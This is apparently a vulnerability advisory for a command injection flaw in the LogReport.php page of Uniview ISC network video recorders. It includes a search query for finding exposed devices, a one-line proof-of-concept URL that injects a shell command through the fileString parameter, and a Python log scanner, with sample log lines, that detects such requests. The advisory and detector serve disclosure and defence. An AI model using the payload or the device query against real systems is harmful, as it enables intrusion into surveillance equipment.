Zhejiang UTV Technology Network Video Recorder ISC LogReport.php Remote Command Execution Vulnerability
Vulnerability Description
The fileString parameter of the /Interface/LogReport/LogReport.php page in Zhejiang UTV Technology Network Video Recorder ISC is not strictly filtered, which allows an attacker to execute arbitrary commands.
Vulnerability Impact
Zhejiang UTV Technology Network Video Recorder ISC
Network asset mapping query
app="uniview-ISC"
Vulnerability Reproduction
Login page
PoC verification
/Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;id>1.txt
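For detection, the request pattern above can be searched for in web access logs. The following is an added example, not part of the original post or the vendor's code: it assumes combined-format access logs, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter names are taken from the advisory.
TARGET_PATH = "/interface/logreport/logreport.php"
# Characters that let a value break out of a shell argument.
SHELL_META = re.compile(r"[;|&`$<>()\r\n]")
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<uri>\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;id>1.txt HTTP/1.1" 200 0',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%3Bid%3E1.txt HTTP/1.1" 200 0',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x%253Bid HTTP/1.1" 200 0',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=update_20240101.log HTTP/1.1" 200 0',
    '198.51.100.8 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?q=a;b HTTP/1.1" 200 0',
]

def suspicious_filestring(uri):
    """Return the decoded fileString if the request matches the advisory's pattern, else None."""
    parts = urlsplit(uri)
    if unquote(parts.path).lower() != TARGET_PATH:
        return None
    # Split on "&" only, so a ";" inside the value is kept rather than treated as a separator.
    params = parse_qs(parts.query, keep_blank_values=True, separator="&")
    if "execUpdate" not in params.get("action", []):
        return None
    for value in params.get("fileString", []):
        # parse_qs decodes once; decode a second time to catch double-encoding.
        for candidate in (value, unquote(value)):
            if SHELL_META.search(candidate):
                return candidate
    return None

def scan(lines):
    """Return (client_ip, decoded_fileString) for every suspicious request line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        value = suspicious_filestring(match.group("uri"))
        if value is not None:
            hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent fileString={value!r}")
```

Only the query string on the request line is inspected, so parameters sent in a request body will not appear in this kind of log.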
This post is licensed under CC BY 4.0 by the author.